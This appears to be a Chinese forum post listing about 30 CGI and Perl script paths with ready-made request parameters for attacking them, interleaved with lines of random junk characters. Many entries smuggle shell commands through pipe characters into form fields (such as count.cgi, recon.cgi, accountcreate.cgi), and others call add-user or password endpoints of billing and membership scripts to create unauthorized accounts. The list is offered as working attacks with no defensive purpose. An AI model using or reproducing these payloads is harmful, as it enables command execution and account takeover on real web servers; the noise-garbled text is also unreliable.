Cgi-bin 30个漏洞＋使用方法

admin

==============================
3 \4 i/ z4 S1 H/ b  d' n9 o9 T
/smspass.pl
username=username&password=password
1 [: _% N: t$ A2 A0 T) g' G( W
; V/ M; b8 h3 D7 `) s2 _! H/index.cgi
; ]" k3 J- N* L0 m; ?( {wei=ren&gen=command
' A$ B( L$ f5 m0 [) S: F( p% Z) i
- `1 J9 B  T1 w8 u: |3 I/passmaster.cgi
3 ^5 g  S" p5 |Action=Add&Username=Username&Password=Password
, b9 n8 Y% z" b
1 Z9 u4 `# i9 f# Z0 j  C# l/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
' m5 ?3 G6 Z3 N% lname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/ ^7 A* s- i4 k# y1 A
" T, B1 o0 Y2 C: ^( c/addusr.pl
0 C5 @/ B% W3 [/cgi-bin/EuroDebit/addusr.pl
, M4 b. t6 P0 U) l0 puser=username&pass=Password&confirm=Password

/ccbill-local.asp
post_values=username:password

( U, _- G( M# Z* f# W/count.cgi
& P+ y8 [2 j* |" T- \0 ppinfile=|echo;ls -la;exit|

& b2 v4 \- Y3 o$ |, }& e/recon.cgi
$ \& y, S8 {/ t% t  q+ r/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
) E1 M# o8 U& e. V0 j5 \
/verotelrum.pl
, C  g; H' r- t" Y0 Wvercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|
1 x8 B" q  S2 S7 ^" f" c
/modify.cgi
username=username&password=password&expire=30

! U* X& |3 c  L# d8 `4 y/openjournal.cgi
" u: @5 Y) s! X+ X* t: Hedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
0 a% \  g; @2 X1 s0 Hcmd=ADD&user=username&pass=password
. @6 e/ s+ l- n7 J
/probecontrol.cgi
command=enable&username=username&password=password
0 X; Y+ x, p+ _+ M8 z
/recon.cgi
9 e* e( q' w9 y5 \searchoption=3&searchfor=echo;ls -la;exit
! D7 c' w! u; q- |- L% `2 k
/htadd.pl
8 i) F% J; B' k0 ?7 f' {configfile=|echo; ls -alt; exit
$ ?2 A: a. V; `* `) J# t
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
3 |. S& U4 D; L0 z4 w3 r: z2 P
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

1 O9 \' d# O7 |" u) t# {8 ]( W/cpay.cgi
( G1 i8 q* W5 h6 b4 X& i5 Jcommand=add_member&username=username(EMAIL)&password=password(DES)

0 P9 _, P- b/ P4 ?( c+ k& R/globill_ut.cgi
! h3 b0 o, F2 W# Ado=add&username=username&password=password&wpassword=password

; Q1 K4 [3 i- o0 w1 N5 p/usercontrol.cgi
! `/ p  U7 s9 u0 v1 |command=enable&username=USER&password=PASS
6 k1 Y7 h9 i4 A; K# g$ H
8 c3 i9 Z$ I9 v# }4 P6 U- \) M/globoSALErum.cgi
" V  c# w0 c; U. l, O2 Faction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
( r5 y. l, a/ |' S
/accountcreate.cgi
- Y# Y/ W5 c4 K7 u& l$ g/cgi-bin/gateway/accountcreate.cgi
7 q1 s! U  o7 d( c' R$ K" Nusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

* U8 m4 |+ a+ c8 \! H" p( U  X5 g" ~/af.cgi
: k- K3 m8 R  e% u! {: m2 `/env.cgi
/ j$ N* a' _0 }1 D, S1 SADD+;echo;pwd;exit

/count.cgi
0 o8 X2 V% r$ L# ^1 M/ Bpinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

==============================
1 X3 j/ j5 f6 C+ b0 {